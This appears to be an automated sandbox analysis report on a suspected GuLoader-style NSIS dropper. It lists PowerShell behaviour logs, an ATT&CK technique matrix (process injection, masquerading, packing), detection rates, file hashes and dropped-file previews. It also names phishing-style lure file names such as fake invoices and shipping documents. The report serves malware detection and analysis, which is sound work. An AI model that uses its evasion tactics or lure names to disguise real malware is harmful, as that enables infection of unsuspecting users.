Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_004033D8 EntryPoint, SetErrorMode, GetVersionExA, GetVersionExA, GetVersionExA, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, ExitProcess, CoUninitialize, ExitProcess, lstrlenA, wsprintfA, GetFileAttributesA, DeleteFileA, SetCurrentDirectoryA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
This API sequence (temp-path setup, self-copy to a temporary file, then OpenProcessToken, LookupPrivilegeValueA and AdjustTokenPrivileges ahead of ExitWindowsEx) matches the entry routine of a stock NSIS installer stub, which fits the nsExec.dll drop and the nsis.sf.net strings elsewhere in this report; the shutdown/reboot capability it signals is the installer's optional reboot path rather than code specific to this sample.
MITRE ATT&CK matrix, listed per tactic. A number in parentheses is the count shown in that matrix cell; techniques without a number had no count in the matrix.
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Windows Management Instrumentation (1), Shared Modules (1), PowerShell (1), Cron, Launchd
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Privilege Escalation: Access Token Manipulation (1), Process Injection (111), DLL Side-Loading (1), Login Hook, Network Logon Script
Defense Evasion: Masquerading (11), Access Token Manipulation (1), Process Injection (111), Software Packing (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Security Software Discovery (1), Process Discovery (1), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (14)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Archive Collected Data (1), Clipboard Data (1), Data from Network Shared Drive, Input Capture, Keylogging
Command and Control: Encrypted Channel (1), Junk Data, Steganography, Protocol Impersonation, Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact
Source | Detection | Scanner | Label
vfhlZ0vrbe.exe | 5% | ReversingLabs |
vfhlZ0vrbe.exe | 100% | Avira | TR/AVI.Agent.jcdgc
vfhlZ0vrbe.exe | 61% | Virustotal |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll | 0% | Virustotal |
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | vfhlZ0vrbe.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | vfhlZ0vrbe.exe | false | | high
No contacted IP info
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588706
Start date and time: 2025-01-11 04:33:39 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: vfhlZ0vrbe.exe
Detection: MAL
Classification: mal76.evad.winEXE@4304/15@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 47
  • Number of non-executed functions: 25
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time | Type | Description
22:37:43 | API Interceptor | 1260x Sleep call for process: powershell.exe modified
No context
Match: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll
Associated samples (SHA 256 available only through the report's "Get hash" link; each is detected as malicious with threat name GuLoader):
  HJEbEB40vP.exe
  HJEbEB40vP.exe
  004552024107.bat.exe
  DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
  Order 00293884800595.bat.exe
  004552024107.bat.exe
  004552024107.bat.exe
  DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
  Order 00293884800595.bat.exe
This context match rests on a shared installer component: nsExec is a stock NSIS plug-in (0% detection in the table above), so the overlap points to a GuLoader-style NSIS dropper rather than identifying the payload itself.
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 52976
Entropy (8bit): 5.060403679465894
Encrypted: false
SSDEEP: 1536:jFZ+z30aPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKguSRIOdBlzStAHkINKeCMiYoLs:hZ+z30aPV3CNBQkj2PqiU7aVKflJnqvs
MD5: B091CFA454A65A5B67683A73974C14BD
SHA1: 11D39F0D3889DCFBBD3174573129043BC5CC35BB
SHA-256: 86D117EE2DBFB915F853D1B7B3BC48BF01554BDCC7F2C21312D19ADE2829F09D
SHA-512: F286D142A66CD5A89FA1281BFEDE900BD09AD67868B516294B361815F6159D4B8E2A0DE4C74AE212D17A3008EB933287E4886EF3F3C8A9DE518C69BF36D2A2E7
Malicious: false
Preview: PSMODULECACHE.G....*..n..I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
The PSMODULECACHE header in the preview is the magic of Windows PowerShell's module analysis cache, which the interpreter rewrites after enumerating module manifests (hence the SmbShare cmdlet names that follow); this modified file is a by-product of the module queries logged above, not a payload.
Process: C:\Users\user\Desktop\vfhlZ0vrbe.exe
File Type: data
Category: dropped
Size (bytes): 359061
Entropy (8bit): 1.2457166424004438
Encrypted: false
SSDEEP: 768:MHp33julIW3oMakaZHsjAq57OSjpLa6E97t0xQwQKdRg+ruVllG7T2MI/BcO98aj:UW3arZHcvZdOyCxcUN03za2kmRb1sGT
MD5: A2C0821CDD9A2B5F524F22E0B15B2D37
SHA1: ED69EC61DCE2BB759EB79BBD2CE1CEF19E2E4230
SHA-256: 7725A12FD4A9A40A74A392FA563D9B6473CFA0668A08C85658862463535D01A5
SHA-512: C8A4A55E9C963D507E7F0E6CA9F31831AB4D0A847D66EBEA3BD92936B8B370B105264AD4CACD5E54E98DDDE75BAAD8D81DF575B81D2178F05B4997A5FA8563B7
Malicious: false
Preview: ........L.........m...........&............q................E.S.............................w..................................z.................F.......................................................................................w............p..v............................................E..............................................................2..G ..S..............}.................J...............................r...........................................F..............................................S........................................................................3...........................y..............................L..............................................................e..........................s..................O......./...............................q..............................................................f..............k.............................w..........................................................Y..............]................
Process: C:\Users\user\Desktop\vfhlZ0vrbe.exe
File Type: Matlab v4 mat-file (little endian), numeric, rows 0, columns 0
Category: dropped
Size (bytes): 450005
Entropy (8bit): 1.2479153298421555
Encrypted: false
SSDEEP: 1536:5Gqj4INxXBamclWiYciYWpzOq9QhNsc3xbEzUw:3j4IpamEBWl9usc3w
MD5: 3056B698C1950649B1C84D88B05A81BE
SHA1: 4660B44B7301962FB449B39D095242457E57BC36
SHA-256: 16AE9F0FE3E58D43323048BE82894E12F16A17608B575FE487C22D0EE0909F16
SHA-512: 4432F2A36003FBDE3B56E0450CEA9C8AE500CEA8A33276F4BB75AA391F2AB273309DC846021A72D6EF15218F99E9303FDDBAACC8667E4E3BFB852DD27A43C5D5
Malicious: false
Preview: ...........................................W...........................................................................................................................l......T.....................................1......................................................V..................."......................g.............................................g................%.........................^............................6F.................................................................................... ..........................k...........................+...........j................/.................c................@..................................................H..................................>../...........................k...........6......E...........\....ZS...............................................................................................\......................................o..................?.....|......n...............................e..........O..
Process: C:\Users\user\Desktop\vfhlZ0vrbe.exe
File Type: data
Category: dropped
Size (bytes): 342526
Entropy (8bit): 1.2624311512278965
Encrypted: false
